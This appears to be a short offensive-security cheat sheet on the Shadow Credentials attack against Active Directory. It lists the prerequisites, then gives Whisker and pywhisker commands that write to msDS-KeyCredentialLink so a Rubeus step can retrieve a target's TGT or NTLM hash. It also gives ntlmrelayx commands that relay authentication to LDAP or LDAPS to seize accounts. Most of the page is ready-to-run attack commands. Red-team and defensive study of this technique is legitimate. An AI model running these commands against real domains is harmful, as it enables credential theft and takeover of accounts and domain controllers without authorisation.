Shadow Credentials

Before jumping into exploiting Shadow Credentials, I highly recommend reading the article from SpecterOps on shadow credentials.

Prerequisites

There are three prerequisites for this attack to be performed:

The ability to write to the msDS-KeyCredentialLink attribute on the target.
AD CS must be configured.
A DC on the domain must be configured to support PKINIT.

Exploitation

After identifying a user account or machine account where the msDS-KeyCredentialLink attribute can be written to, Whisker can be used to essentially automate the exploitation from a Windows machine:

# Generic usage of Whisker
Whisker.exe add /target:parzival

## https://github.com/ShutdownRepo/pywhisker
# Generic usage of PyWhisker
pywhisker.py -d $domain -u $user -p $password --target $target --action "list"x

Following running Whisker, it will provide a Rubeus command that can be executed in order to pull the targets TGT or NTLM hash.

Relaying

Ntlmrelayx also supports exploiting shadow credentials and can be used as follows:

# Relaying will work against either LDAP or LDAPS

# LDAPS
ntlmrelayx -t ldaps://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'

# LDAP
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials --shadow-target 'parz-dc2'

## Failing to specify the --shadow-target will attempt to obtain a hash for the relayed user. 
ntlmrelayx -t ldap://parz-dc1 --shadow-credentials